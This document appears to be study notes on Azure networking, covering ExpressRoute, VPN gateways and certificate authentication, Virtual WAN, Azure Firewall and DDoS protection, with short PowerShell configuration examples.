  • ExpressRoute connections typically have redundant connectivity from the partner network into the Microsoft edge routers.

Benefits

  • Layer 3 connectivity between your on-premises network and the Microsoft Cloud through a connectivity provider.
  • Connectivity can be from an any-to-any (IPVPN) network, a point-to-point Ethernet network, or a virtual cross-connection through a connectivity provider at a co-location facility.
  • Connectivity to Microsoft cloud services across all regions in the geopolitical region.
  • Global connectivity to Microsoft services across all regions with the ExpressRoute premium add-on.
  • Built-in redundancy in every peering location for high availability.

Private vs. Public Peering

Peering refers to the connection between two networks for traffic exchange.

  • Private peering allows remote networks to access Azure vNets and resources connected to those vNets, such as infrastructure and PaaS services.
  • Public peering allows remote networks to access Microsoft Cloud services such as Office 365 and Azure Platform services.

ExpressRoute Components

  • On-prem devices: Devices located physically within an organization’s premises

  • Customer Edge (CE) router: The on-premises router that connects to the service provider’s edge router.

  • Provider Edge (PE) devices facing CE routers: These are devices used by the provider to connect to the CE router.

  • Partner Edge devices facing Microsoft Edge routers: These are devices used by ExpressRoute service providers to connect to Microsoft Edge routers

  • Microsoft Edge Routers: These are redundant pairs of routers on the Microsoft side of the ExpressRoute connection.

  • ExpressRoute vNet Gateway: This service connects an ExpressRoute connection with an Azure vNet.

  • Azure vNet: A virtual network in Azure that can be connected to an ExpressRoute circuit.


ExpressRoute Connectivity Models

When architecting an ExpressRoute connection, you can choose from two different connectivity models:

  • Provider Model: The provider model connects a remote network to Azure using a third-party provider. To establish this connection, we need to work with the provider to set up the connection. Depending on the service offering the ExpressRoute partner provides, we have up to 3 connectivity options that we can implement:

    • Cloud Exchange co-location

      • This involves moving our infrastructure into a data center where the ExpressRoute partner has a presence. We can then order virtual cross-connections to the Microsoft network. The cross-connect could be a layer 2 or layer 3 connection.
    • Point-to-point Ethernet connection

      • This involves working with an ISP that provides single-site layer 2 or layer 3 connectivity between the remote network and the Azure vNet. The key point with this option is that connectivity is for a single customer site.
    • Any-to-Any IPVPN connection

      • This option leverages ISP-provided MPLS connectivity to connect multiple customer sites with the Microsoft cloud network. This model is recommended for customers with existing MPLS connections.
  • ExpressRoute Direct Model:

    • This model allows a customer’s network to connect directly to Microsoft at peering locations strategically placed around the world, with a 10 Gbps or dual 100 Gbps connection.

    • This model supports active/active connectivity at scale

    • This model does not rely on a third party for ExpressRoute connectivity.

    • This model is good when very high bandwidth is required.

Route Advertisement

  • When Microsoft peering gets configured on your ExpressRoute circuit, the Microsoft Edge routers establish a pair of BGP sessions with your edge routers through your connectivity provider. No routes are advertised to your network by default. To enable route advertisements, you must associate a route filter.

ExpressRoute Circuit SKUs

  • ExpressRoute circuits are offered in three SKUs:

    • Local
      • Can be used to provide connectivity to vNets in one or two Azure regions in the same metro/geographical area.
      • Not all ExpressRoute locations support the ‘Local’ SKU
      • One benefit of the local SKU is there is no additional cost for transferring data out of Azure through the ExpressRoute connection (egress data).
    • Standard
      • Can provide connectivity to vNets and Azure services in Azure regions in a geopolitical area. For example, all regions in North America.
      • Egress data transfer is an added cost.
      • There are two billing models for egress data. Metered and Unlimited.
        • Metered requires that you estimate how much egress data you will use, and you only pay for that amount.
        • Unlimited allows you to use any amount of data but has a fixed monthly fee.
    • Premium
      • Can provide connectivity to vNets globally.
      • There are two billing models for egress data. Metered and Unlimited.
        • Metered requires that you estimate how much egress data you will use, and you only pay for that amount.
        • Unlimited allows you to use any amount of data but has a fixed monthly fee.
      • The premium SKU is required if you plan to use Microsoft peering to access Microsoft SaaS/PaaS services over the ExpressRoute connection.
  • The table below compares the Standard and Premium SKUs (a circuit-creation sketch follows the table):

| Feature | ExpressRoute Standard | ExpressRoute Premium |
| --- | --- | --- |
| Global Reach | No | Yes |
| Increased Route Limits | No | Yes |
| Connectivity to Microsoft Peering | Limited to the same geopolitical region | Global connectivity |
| Service Providers | Limited | Expanded |
| Route Advertisements | 4,000 | 10,000 |
| Support for Azure Government and National Clouds | No | Yes |
| BGP Communities | No | Yes |
| BGP Sessions | 2 per peering, per ExpressRoute circuit | 4 per peering, per ExpressRoute circuit |
| Cost | Lower | Higher |
| Availability | Varies by region | Varies by region |
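
A hedged Azure PowerShell sketch of creating a circuit with an explicit SKU tier and billing model (the provider, peering location, and bandwidth are placeholder values; your connectivity provider determines what is actually available):

# SkuTier can be Local, Standard, or Premium; SkuFamily is MeteredData or UnlimitedData
New-AzExpressRouteCircuit -Name 'er-circuit-demo' -ResourceGroupName 'rg-demo' -Location 'eastus' `
    -SkuTier Standard -SkuFamily MeteredData `
    -ServiceProviderName 'Equinix' -PeeringLocation 'Washington DC' -BandwidthInMbps 200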

ExpressRoute Gateway SKUs

  • When we create an ExpressRoute Gateway service, we need to specify the SKU that we want to use. We can choose from one of the following three:
    • Standard / ErGw1AZ: This option supports a maximum of four ExpressRoute connections and up to 1 Gbps of bandwidth
    • High Performance / ErGw2AZ: This option supports a maximum of eight ExpressRoute connections and up to 2 Gbps of bandwidth
    • Ultra Performance / ErGw3AZ: This option supports a maximum of 16 ExpressRoute connections and up to 10 Gbps of bandwidth
  • The SKUs with ‘AZ’ in the name are zone-redundant, meaning they are highly available across Azure Availability Zones.
  • We can change a SKU after the Gateway has been created
  • An ExpressRoute Gateway must be deployed in a Gateway subnet. (Named ‘GatewaySubnet’). It is recommended to use at least a /26 for the GatewaySubnet.
  • When choosing a Gateway SKU, we want to ensure the bandwidth of the SKU matches the bandwidth of the circuit.

ExpressRoute FastPath

FastPath is designed to improve the data path performance between connected remote networks and Azure vNets. To understand how FastPath works, we need to understand the default behavior without it. By default, the ExpressRoute Gateway performs two main tasks: exchanging network routes with our remote networks AND routing network traffic to Azure vNet resources. Routing the network traffic adds a little processing overhead, which impacts performance metrics such as Packets per Second (PPS) and Connections per Second (CPS). When enabled, FastPath sends network traffic directly to vNet resources, bypassing the gateway. This results in higher bandwidth and better overall performance. FastPath is available for all ExpressRoute circuits, but the ExpressRoute Gateway must be either the ultra-performance or ErGw3AZ SKU.

Encryption over ExpressRoute

  • By default, ExpressRoute connections are not encrypted.
  • Microsoft offers two optional solutions for encrypting data in transit over ExpressRoute connections:
    • MACsec - a Layer 2 encryption protocol that can be used to encrypt physical links. To implement MACsec, we need a Key Vault to store the encryption keys. This key is referred to as the connectivity association key (CAK).
    • IPSec - a Layer 3 encryption protocol that can be used to encrypt data between two endpoints. To implement IPSec, we need to configure a VPN Gateway in Azure and a VPN device on-premises.

BFD

  • BFD (Bidirectional Forwarding Detection) is a network protocol that detects link failures in a network. It is used to detect failures in the forwarding plane of a network.
  • BFD is supported over private peering and Microsoft peering.
  • When you enable BFD, you can speed up failure detection between Microsoft Enterprise Edge (MSEE) devices and your equipment.
  • How it works:
    • On the MSEE devices, BGP keep-alive and hold-time are typically configured as 60 and 180 seconds, respectively. For that reason, when a link failure happens, it can take up to three minutes to detect the failure and switch traffic to an alternate connection.
    • You can control the BGP timers by configuring a lower BGP keep-alive and hold-time on your edge peering device. If the BGP timers are not the same between the two peering devices, the BGP session will establish using the lower time value. The BGP keep-alive can be set as low as 3 seconds. The hold-time can be as low as 10 seconds. However, setting these values too low isn’t recommended because the protocol is process-intensive.

Configure ExpressRoute and site to site coexisting connections

  • Configuring Site-to-Site VPN and ExpressRoute coexisting connections has several advantages:

    • You can configure a Site-to-Site VPN as a secure failover path for ExpressRoute.
    • Alternatively, you can use Site-to-Site VPNs to connect to sites that are not connected through ExpressRoute.
  • You can configure either gateway first. Typically, you will incur no downtime when adding a new gateway or gateway connection.

  • Network Limits and limitations

    • Only route-based VPN gateways are supported. You can, however, use a route-based VPN gateway with a VPN connection configured for ‘policy-based traffic selectors’.
    • The ASN of Azure VPN Gateway must be set to 65515. Azure VPN Gateway supports the BGP routing protocol. For ExpressRoute and Azure VPN to work together, you must keep the Autonomous System Number of your Azure VPN gateway at its default value, 65515. If you previously selected an ASN other than 65515 and you change the setting to 65515, you must reset the VPN gateway for the setting to take effect.
    • The gateway subnet must be /27 or larger (a shorter prefix such as /26 or /25), or you will receive an error message when you add the ExpressRoute virtual network gateway.
    • Coexistence in a dual stack VNet is not supported. If you are using ExpressRoute IPv6 support and a dual-stack ExpressRoute gateway, coexistence with VPN Gateway will not be possible.

VPN

What is a VPN?

  • A VPN (Virtual Private Network) is a service that allows you to connect to the internet via an encrypted tunnel to ensure your online privacy and protect your sensitive data.

Azure Point to Site VPN

  • Azure Point-to-Site (P2S) VPN is a secure connection between an individual client computer and an Azure virtual network.
  • The connection is encrypted and gives the client secure access to resources in the Azure virtual network.
  • A VPN client installed on the client computer is used to establish the connection to the Azure virtual network.
  • The Virtual Network Gateway terminates the P2S connections on the Azure side.
  • P2S VPN Connections require that you configure 3 configuration settings in Azure (in addition to a VNG, etc.):
    • Address Pool: The IP address range that will be assigned to the VPN clients.
      • The address range that you choose must not overlap with the vNet’s address range.
      • If multiple protocols are configured for the tunnel type, and SSTP is one of those protocols, the address pool will be split between the configured protocols.
    • Tunnel Type: The tunnel type that will be used for the VPN connection. Options are SSTP, IKEv2, and OpenVPN.
      • OpenVPN is SSL-based and operates on port 443.
        • OpenVPN is supported on all platforms, but a client will usually need to be downloaded and installed.
        • OpenVPN is required if you want clients to authenticate with Azure Active Directory credentials.
      • SSTP is SSL-based and operates on port 443. It is a Microsoft-proprietary protocol.
      • IKEv2 is IPsec-based and operates on UDP ports 4500 and 500 and IP protocol number 50.
        • Android, Linux, iOS, MacOS, and Windows 10 (and above) come pre-installed with clients that support IKEv2.
        • Windows clients try IKEv2 first when negotiating a connection and fall back to SSTP if IKEv2 fails.
    • Authentication Type: The authentication type that will be used for the VPN connection. Options are Azure Certificate, Azure AD, and Radius.
      • Azure Certificate: The client must have a client certificate installed to connect to the Azure Virtual Network Gateway.
        • The client certificate must be installed in the ‘Local Machine’ certificate store on the client computer.
        • The Virtual Network Gateway must have the public key of the client certificate uploaded to the Azure Virtual Network Gateway. Or the public key of the root certificate that signed the client certificate.
      • Azure AD: The client must have an Azure Active Directory account to connect to the Azure Virtual Network Gateway.
        • Allows users to connect to the VPN using their Azure AD credentials.
        • Native Azure AD authentication is only supported for OpenVPN connections that use the Azure VPN Client for Windows 10 or later and MacOS clients.
        • The main advantage here is we can benefit from additional identity and security capabilities provided by Azure AD, such as MFA.
      • Radius: The client must have a Radius account to connect to the Azure Virtual Network Gateway. Clients authenticate against a RADIUS server hosted in Azure or on-premises.
        • The Virtual Network Gateway forwards authentication requests to/from the client and RADIUS server. Connectivity is important!
        • The RADIUS server can integrate with Microsoft Entra ID or any other external identity system. There is no need to upload root certificates or revoke client certificates in Azure.
  • P2S connections require a route-based VPN Type.
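
A minimal Azure PowerShell sketch of applying the address pool and tunnel type settings above to an existing gateway (the gateway name, resource group, and 172.16.201.0/24 pool are placeholder assumptions):

# Assign the client address pool and tunnel type on an existing route-based VPN gateway
$gw = Get-AzVirtualNetworkGateway -Name 'vgw-demo' -ResourceGroupName 'rg-demo'
Set-AzVirtualNetworkGateway -VirtualNetworkGateway $gw `
    -VpnClientAddressPool '172.16.201.0/24' -VpnClientProtocol OpenVPN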

Azure Site to Site VPN

  • Azure Site-to-Site VPN is a secure connection between an on-premises network and an Azure virtual network.
  • The VPN connection is encrypted and provides secure access to on-premises resources.
  • The VPN connection is established between the on-premises network and the Azure virtual network.
  • The Virtual Network Gateway is used to connect the on-premises network to the Azure virtual network.
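
A minimal Azure PowerShell sketch of wiring the pieces together, assuming a route-based virtual network gateway ($gw) and a local network gateway ($lng) already exist (names and the shared key are placeholders):

# Create the IPsec connection between the Azure VPN gateway and the on-premises VPN device
New-AzVirtualNetworkGatewayConnection -Name 'cn-onprem' -ResourceGroupName 'rg-demo' -Location 'eastus' `
    -VirtualNetworkGateway1 $gw -LocalNetworkGateway2 $lng `
    -ConnectionType IPsec -SharedKey 'REPLACE-WITH-PRESHARED-KEY'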

Virtual Network Gateway

  • A Virtual Network Gateway is used to send encrypted traffic between an Azure virtual network and an on-premises location over the public internet.

  • Virtual Network Gateway supports the following hybrid connection options:

    • Site to Site VPN connection over IPSec (IKE v1 and IKE v2) - This option can be used to connect an on-premises network to an Azure virtual network.
    • Point to Site VPN connection over SSTP, IKEv2, or OpenVPN - This option can be used to connect a client computer to an Azure virtual network.
    • VNet to VNet VPN connection over IPSec (IKE v1 and IKE v2) - This option can be used to connect two Azure virtual networks.
  • When implementing the VPN Gateway to connect two vNets, there are two connection types you can choose from:

    • vNet-to-vNet: If the source and targets vNets are in the same Azure subscription, choose this option.
    • Site-to-Site (IPsec): If the source and target vNets are not in the same Azure subscription, choose this option.

Virtual Network Gateway SKUs


Virtual Network Gateway Pricing

| SKU | Price |
| --- | --- |
| Basic | $0.04/hour |
| VpnGw1 | $0.19/hour |
| VpnGw2 | $0.49/hour |
| VpnGw3 | $1.25/hour |
| VpnGw4 | $2.10/hour |
| VpnGw5 | $3.65/hour |

Virtual Network Gateway Certificate Authentication

  • Azure Virtual Network Gateway supports certificate authentication for Point-to-Site VPN connections.
  • The VPN client must have a client certificate installed to connect to the Azure Virtual Network Gateway.
  • The client certificate must be installed in the ‘Local Machine’ certificate store on the client computer.
# Create a self-signed root certificate
$params = @{
    Type = 'Custom'
    Subject = 'CN=P2SRootCert'
    KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyUsage = 'CertSign'
    KeyUsageProperty = 'Sign'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(24)
    CertStoreLocation = 'Cert:\CurrentUser\My'
}
$cert = New-SelfSignedCertificate @params

# Create a self-signed client certificate
$params = @{
    Type = 'Custom'
    Subject = 'CN=P2SChildCert'
    DnsName = 'P2SChildCert'
    KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(18)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    Signer = $cert
    TextExtension = @('2.5.29.37={text}1.3.6.1.5.5.7.3.2')
}
New-SelfSignedCertificate @params
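
After generating the root certificate above, its public key (not the private key) is uploaded to the gateway. A sketch, reusing the $cert variable from the first block (the gateway and resource group names are placeholder assumptions):

# Export the root certificate's public data as Base64 and upload it to the gateway
$certData = [System.Convert]::ToBase64String($cert.RawData)
Add-AzVpnClientRootCertificate -VpnClientRootCertificateName 'P2SRootCert' `
    -VirtualNetworkGatewayName 'vgw-demo' -ResourceGroupName 'rg-demo' -PublicCertData $certData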

Azure Active Directory Authentication

  • Azure Virtual Network Gateway supports Azure Active Directory authentication for Point-to-Site VPN connections.
  • The VPN client must have an Azure Active Directory account to connect to the Azure Virtual Network Gateway.
  • You must register an Azure AD application and grant permissions to the application to use the Azure Virtual Network Gateway.
  • You must set the authentication type to ‘Azure Active Directory’ in the Azure Virtual Network Gateway configuration.
    • You must provide the Tenant ID, Audience (client Id of app), and Issuer of the Azure AD application in the Azure Virtual Network Gateway configuration.
  • Download and install the Azure VPN Client from the MS Store
  • Sign in with your Azure AD account to connect to the Azure Virtual Network Gateway.

Radius Authentication

  • Azure Virtual Network Gateway supports Radius authentication for Point-to-Site VPN connections.
  • The VPN client must have a Radius account to connect to the Azure Virtual Network Gateway.
  • You must configure the Radius server settings in the Azure Virtual Network Gateway configuration.
  • You must provide the Radius server IP (primary and secondary) and Radius server secret (primary and secondary)

Local Network Gateway

  • A Local Network Gateway is a representation of the on-premises location. It contains the public IP address of the on-premises location and the address space.
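
A minimal Azure PowerShell sketch (the public IP and on-premises address prefix are placeholder assumptions):

# The local network gateway represents the on-premises VPN device and its address space
New-AzLocalNetworkGateway -Name 'lng-onprem' -ResourceGroupName 'rg-demo' -Location 'eastus' `
    -GatewayIpAddress '203.0.113.10' -AddressPrefix '192.168.0.0/24'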

Gateway Subnet

  • The gateway subnet is used to deploy the virtual network gateway. The gateway subnet must be named ‘GatewaySubnet’ to work properly.
  • The gateway subnet must be at least /29; a /27 or larger is recommended (and is required for ExpressRoute coexistence), as in the sketch below.
  • Nothing else should be deployed in the gateway subnet; it is used by the gateway services only.
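
A sketch of adding the gateway subnet to an existing vNet (the vNet name and 10.0.255.0/27 prefix are placeholder assumptions):

# The subnet must be named exactly 'GatewaySubnet'
$vnet = Get-AzVirtualNetwork -Name 'vnet-hub' -ResourceGroupName 'rg-demo'
Add-AzVirtualNetworkSubnetConfig -Name 'GatewaySubnet' -AddressPrefix '10.0.255.0/27' -VirtualNetwork $vnet
$vnet | Set-AzVirtualNetwork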

Route based vs. Policy based VPN

  • Policy-based VPN - This type of VPN uses a policy defined on the VPN to determine where to send traffic. The policy defines an access list of traffic that should be sent through the VPN tunnel.

    • Limitations:
      • There is no support for dynamic routing protocols such as BGP.
      • It can only be used to establish site-to-site VPN connections.
      • It only supports 1 tunnel when implemented with the basic gateway.
      • If you have a legacy on-prem VPN device that does not support route-based VPNs, you will likely need to create a policy-based VPN.
  • Route-based VPN - This type of VPN uses a routing table to determine where to send traffic. The routing table is used to determine the next hop for the traffic.

    • Only route-based gateway SKUs support active/active mode.
    • Point-to-site connections require a route-based VPN gateway.


Troubleshoot VPNs

  • There are several diagnostic logs you can reference when troubleshooting VPN Connections and Virtual Network Gateways
    • Gateway Diagnostic Log: This log contains diagnostic logs for the gateway, including configuration changes and maintenance events.
    • Tunnel Diagnostic Log: This log contains tunnel state change events. This log is useful to view the historical connectivity status of the tunnel.
    • Route Diagnostic Log: This log contains routing logs, including changes to static routes and BGP events
    • IKE Diagnostic Log: This log contains IKE control messages and events on the gateway.
    • P2S Diagnostic Log: This log contains point-to-site control messages and events on the gateway.

Azure Virtual WAN

Overview

  • Azure Virtual WAN (vWAN): A networking service that provides optimized and automated branch connectivity to, and through, Azure.
  • Virtual Hub: A Microsoft-managed virtual network that enables connectivity between your on-premises networks, Azure VNets, and remote users.

Key Features

  1. Centralized Management: Simplifies the management of large-scale network architectures by providing a single pane of glass for managing connectivity.
  2. Scalability: Designed to handle thousands of VNets, branch connections, and users.
  3. High Availability: Built-in redundancy and high availability for critical network connections.
  4. Security: Integrated with Azure Firewall, DDoS protection, and other security services for comprehensive protection.
  5. Connectivity: Supports Site-to-Site VPN, Point-to-Site VPN, ExpressRoute, and Azure Private Link.

Components

  • Virtual WAN: A management service that we can use to deploy, manage, and monitor resources for connecting networks together. This is a global resource and does not live in a particular network.
  • vWAN Hubs: Regional virtual network hubs that provide central connectivity and routing. A virtual hub is a Microsoft-managed virtual network that contains various service endpoints to enable connectivity.
    • From your on-premises network (vpnsite), you can connect to a VPN gateway inside the virtual hub, connect ExpressRoute circuits to a virtual hub, or connect mobile users to a point-to-site gateway in the virtual hub.
    • The hub is the core of your network in a region. Multiple virtual hubs can be created in the same region.
    • A hub gateway isn’t the same as the virtual network gateway you use for ExpressRoute and VPN Gateway. With Virtual WAN, you don’t create a site-to-site connection from your on-premises site directly to your VNet; you create it to the hub, and the traffic always goes through the hub gateway.
    • This means your VNets don’t need their own virtual network gateway; Virtual WAN lets your VNets scale easily through the virtual hub and the virtual hub gateway.
  • vWAN HUB Connections: Connections between a hub and a VNet in the same region. A vNet can only be connected to one hub.
  • Hub-to-Hub Connections: Connectivity between hubs in different regions for global reach. Hubs are all connected to each other in a virtual WAN. This implies that a branch, user, or VNet connected to a local hub can communicate with another branch or VNet using the full mesh architecture of the connected hubs. You can also connect VNets within a hub transiting through the virtual hub, as well as VNets across hubs, using the hub-to-hub connected framework.
  • Branch-to-Hub Connections: Site-to-site VPN connections from on-premises locations to the hub.
  • User VPN Connections: Point-to-site VPN connections from remote users to the hub.

Use Cases

  1. Branch Connectivity: Simplifies the connection of branch offices to Azure and to each other.
  2. Global Network Architecture: Centralizes and optimizes connectivity between VNets and on-premises networks across multiple regions.
  3. Remote Access: Provides secure access for remote users through point-to-site VPN.

Benefits

  • Simplified Configuration: Reduces the complexity of managing multiple VNets and connections.
  • Optimized Performance: Leverages Microsoft’s global backbone for high performance and low latency.
  • Cost-Effective: Reduces the need for expensive hardware and dedicated network connections.

Types of vWAN

  • Basic
    • Only supports site-to-site VPN connections in a single hub (no hub-to-hub, ExpressRoute, or user VPN connections).
    • There is a cost advantage in that we do not have to pay the base hourly fee and data processing fee for the vWAN hubs that we implement.
  • Standard
    • Supports all connectivity types across multiple hubs.
    • There is an hourly base fee for every hub that we create ($0.25/hour).
  • You can change the SKU after the vWAN has been created. You can upgrade a basic to a standard, but you cannot downgrade a standard to a basic.

Routing Infrastructure Units (RIUs)

  • When a new vWAN hub is created, a virtual hub router is deployed into it. The virtual hub router is the central component that manages all routing between vNETs and gateways.
  • A Routing Infrastructure Unit (RIU) is a unit of scale that defines both the aggregate throughput of the virtual hub router and the aggregate number of virtual machines that can be deployed in all connected VNets.
  • By default, the virtual hub router is deployed with 2 RIUs at no extra cost. The 2 units support 3 Gbps of throughput and 2,000 VMs across all connected vNETs.
  • You can add additional RIUs in increments of 1 Gbps of throughput and 1,000 VM connections.
  • There is an additional cost of $0.10 per RIU above the 2 that are included.
| Routing infrastructure units | Aggregate throughput (Gbps) | Number of VMs |
| --- | --- | --- |
| 2 | 3 | 2000 |
| 3 | 3 | 3000 |
| 4 | 4 | 4000 |
| 5 | 5 | 5000 |
| 6 | 6 | 6000 |
| 7 | 7 | 7000 |
| 8 | 8 | 8000 |
| 9 | 9 | 9000 |
| 10 | 10 | 10000 |

Site to Site Connectivity with vWAN

  • You can connect remote networks to the vWAN hub using site-to-site VPN connections or ExpressRoute.
  • To deploy a site to site VPN connection, we need to deploy a Site-to-Site VPN Gateway into our vWAN hub by specifying the number of gateway scale units we want. The number that we specify for the Gateway Scale Units defines the aggregate maximum throughput for the VPN connections.
  • S2S VPN Gateway instances in a vWAN hub are always deployed in an active-active configuration for high availability.
  • A VPN Gateway in a vWAN hub is limited to 30 connections, while 20 Gateway Scale Units in a vWAN hub can support up to 1,000 connections.

Routing Order Precedence

  • If multiple paths exist for a destination subnet, the virtual hub router uses the following logic to determine the route to the destination:
    1. Routes with the longest prefix match are always preferred
    2. Static routes are preferred over routes learned via BGP
    3. The best path is selected based on the route preference configured (ExpressRoute-learned route, VPN-learned route, or the route with the shortest BGP AS-Path Length)

Secure-and-monitor-networks

Directory Map

Application Security Groups

Introduction

  • Application Security Groups (ASGs) are used to group virtual machines and apply network security group rules to the group

Benefits

  • Simplifies network security group management
  • Reduces the number of rules that need to be created
  • Allows for more granular control over network security group rules

Example

  • Create an ASG
  • Add VMs to the ASG
  • Add the ASG as a traffic source in a network security group rule
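
A minimal Azure PowerShell sketch of the three steps above (names and the port are placeholder assumptions; the NIC step is shown only as a comment):

# 1. Create the ASG
$asg = New-AzApplicationSecurityGroup -Name 'asg-web' -ResourceGroupName 'rg-demo' -Location 'eastus'

# 2. Add VMs to the ASG by attaching it to their NIC IP configurations
#    (e.g., with Set-AzNetworkInterfaceIpConfig and its -ApplicationSecurityGroup parameter)

# 3. Use the ASG as the traffic source in an NSG rule instead of listing individual VM IPs
$rule = New-AzNetworkSecurityRuleConfig -Name 'allow-web-to-sql' -Access Allow -Protocol Tcp `
    -Direction Inbound -Priority 120 -SourceApplicationSecurityGroup $asg -SourcePortRange '*' `
    -DestinationAddressPrefix '*' -DestinationPortRange '1433'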

Azure Firewall

Introduction

  • Azure Firewall is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It’s a fully stateful firewall as a service with built-in high availability and unrestricted cloud scalability. It can be used to scan inbound and outbound traffic.
  • Azure Firewall requires its own subnet. The name needs to be AzureFirewallSubnet.
  • Force Tunneling requires that a subnet named AzureFirewallManagementSubnet be created. This subnet is used for Azure Firewall management traffic.
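
A hedged Azure PowerShell sketch of deploying a firewall into a vNet that already contains a subnet named AzureFirewallSubnet (the vNet, resource group, and IP names are placeholder assumptions):

# The firewall needs a Standard static public IP and a subnet named 'AzureFirewallSubnet' in the vNet
$vnet = Get-AzVirtualNetwork -Name 'vnet-hub' -ResourceGroupName 'rg-demo'
$pip  = New-AzPublicIpAddress -Name 'pip-azfw' -ResourceGroupName 'rg-demo' -Location 'eastus' `
    -AllocationMethod Static -Sku Standard
New-AzFirewall -Name 'azfw-hub' -ResourceGroupName 'rg-demo' -Location 'eastus' `
    -VirtualNetwork $vnet -PublicIpAddress $pip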

Azure Firewall Features

  • Built-in high availability
  • Unrestricted cloud scalability
  • Application FQDN Filtering rules
  • FQDN Tags - tags make it easy for you to allow well-known Azure Service network traffic through your firewall.
  • Service Tags - A service tag represents a group of IP address prefixes to help minimize security rule complexity. Microsoft manages these. You cannot create your own service tags or modify existing service tags.
  • Threat Intelligence - IDS/IPS
  • TLS Inspection - decrypt outbound traffic, process the data, and then re-encrypt it before sending it to its destination
  • Outbound SNAT support
  • Inbound DNAT support
  • Forced Tunneling

Rule Processing

Classic Rules

  • You can create NAT rules, network rules, and application rules, and this can all be done using classic rules or Firewall Policy
  • Azure Firewall denies all traffic by default. You must create rules to allow traffic.
  • With classic rules, rule collections are processed according to the rule type in priority order, from lower to higher numbers: 100 is the highest priority and 65000 is the lowest.

Firewall Policy

  • Configuring a single Azure Firewall can be complex due to multiple rule collections, including:
    • Network Address Translation (NAT) rules
    • Network rules
    • Application rules
  • Additional complexities include custom DNS settings, threat intelligence rules, and the need for different rules for different groups (e.g., developers, database users, marketing).
  • Firewall Policy:
    • An Azure resource that contains collections of NAT, network, and application rules.
    • Also includes custom DNS settings, threat intelligence settings, and more.
    • Can be applied to multiple firewalls via Azure Firewall Manager.
    • Supports hierarchical policies, where a base policy can be inherited by specialized policies.
  • With Firewall Policy, rules are organized in rule collections which are contained in rule collection groups. Rule collections can be of the following types:
    • DNAT
    • Network
    • Application
  • You can define multiple rule collection types in a rule collection group. But all of the rules in a rule collection must be of the same type.
  • Rule collections are processed in the following order:
    • DNAT
    • Network
    • Application

Availability Zones

  • Azure Firewall supports Availability Zones. When you create an Azure Firewall, you can choose to deploy it in a single zone or across all zones.
  • SLAs:
    • Single Zone: 99.95%
    • Multiple Zones: 99.99%

Azure Firewall Service Tiers

  • Azure Firewall is available in three service tiers: Basic, Standard, and Premium.
    • Basic: Designed for small and medium-sized businesses.
      • Provides basic network traffic protection at an affordable cost.
    • Standard: Designed for organizations that require basic network security with high scalability at a moderate price.
    • Premium: Designed for organizations in highly regulated industries that handle sensitive information and require a higher level of network security.
      • Able to encrypt/decrypt network traffic for TLS inspection
      • IDS/IPS capabilities
      • Supports path based URL filtering
        • Standard supports URL filtering, but you cannot filter based on the path of the URL.
      • Web Categories
        • Allow or deny traffic to and from websites based on categories (gambling, social media, pornography, etc.)

Azure Firewall Capabilities

  • Network Filtering
    • Can filter traffic based on the five tuples of the source IP address, destination IP address, source port, destination port, and protocol.
      • You can filter based on user-defined groups of IP addresses or on Azure Service Tags.
  • FQDN Filtering
    • A simple URL filter without TLS termination or packet inspection.
    • FQDN Filtering can be enabled at the network level or the application level. If configured at the application layer, it uses information in the HTTP headers to allow or block outgoing web traffic or Azure SQL traffic.
    • Can be bypassed by initiating requests using IP addresses.
    • To simplify applying rules to multiple FQDNs, you can use FQDN Tags. For example, if you wanted to filter Windows Update FQDNs, rather than manually maintaining a list of all the Windows Update FQDNs, you could simply use the Windows Update FQDN Tag.
  • URL Filtering
    • Expands on FQDN filtering to evaluate the entire URL path, rather than just domain names.
    • This feature is only available with the Premium SKU.
  • Web Categorization Filtering
    • Can be used to allow or block outgoing web traffic based on the category of the website. For example, you could block all social media websites.
    • Both Standard and Premium SKUs support this feature, with the Premium SKU supporting more accurate categorization.
  • Threat Intelligence-based Filtering
    • Azure Firewall can use threat intelligence feeds to block known malicious IP addresses and domains.
    • Enabled in Alert mode by default, but it can also be configured in Alert and Deny mode, or disabled entirely.
    • Supported by both Premium and Standard SKUs.

Azure Firewall Manager

  • Azure Firewall Manager provides a central point for configuration and management of multiple Azure Firewall instances.
  • Enables the creation of one or more firewall policies that can be rapidly applied to multiple firewalls.

Key Features of Azure Firewall Manager

| Feature | Description |
| --- | --- |
| Centralized management | Manage all firewall configurations across your network. |
| Manage multiple firewalls | Deploy, configure, and monitor multiple firewalls from a single interface. |
| Supports multiple network architectures | Protects standard Azure virtual networks and Azure Virtual WAN Hubs. |
| Automated traffic routing | Network traffic is automatically routed to the firewall (when used with Azure Virtual WAN Hub). |
| Hierarchical policies | Create parent and child firewall policies; child policies inherit rules/settings from parent. |
| Support for third-party security providers | Integrate third-party SECaaS solutions to protect your network’s internet connection. |
| DDoS protection plan | Associate virtual networks with a DDoS protection plan within Azure Firewall Manager. |
| Manage Web Application Firewall policies | Centrally create and associate Web Application Firewall (WAF) policies for platforms like Azure Front Door and Azure Application Gateway. |

Note: Azure Firewall Manager allows integration with third-party SECaaS solutions, enabling Azure Firewall to monitor local traffic while the third-party provider monitors internet traffic.

Architecture Options

  • Hub virtual network: A standard Azure virtual network where one or more firewall policies are applied.
  • Secured virtual hub: An Azure Virtual WAN Hub where one or more firewall policies are applied.

DDoS Protection

Overview

A distributed denial of service attack occurs when an attacker overwhelms a target with a flood of traffic, rendering the target unable to respond to legitimate requests. DDoS attacks can be difficult to mitigate because the attacker can use many different IP addresses to send traffic to the target. This makes it difficult to block the attacker’s traffic without also blocking legitimate traffic.

Types of DDoS Attacks

  • Volumetric Attacks: These attacks flood the target with a large amount of traffic, overwhelming the target’s network capacity.
  • Protocol Attacks: These attacks exploit vulnerabilities in network protocols to consume the target’s resources.
  • Application Layer Attacks: These attacks target the application layer of the target, consuming resources such as CPU and memory.

Azure DDoS Protection provides protection against volumetric and protocol attacks. To protect against application layer attacks, you can use a Web Application Firewall (WAF).

Azure DDoS Protection

  • Service Tiers
    • IP Protection: This tier offers a pricing model in which you pay per protected public IP address.
    • Network Protection: This tier offers protection for an entire virtual network and all public IP addresses that are associated with resources in the vNet.
      • DDoS Network Protection provides additional features that are not available with the IP Protection:
        • DDoS Rapid Response Support - Gives you access to a team of DDoS response specialists who can help you mitigate an attack.
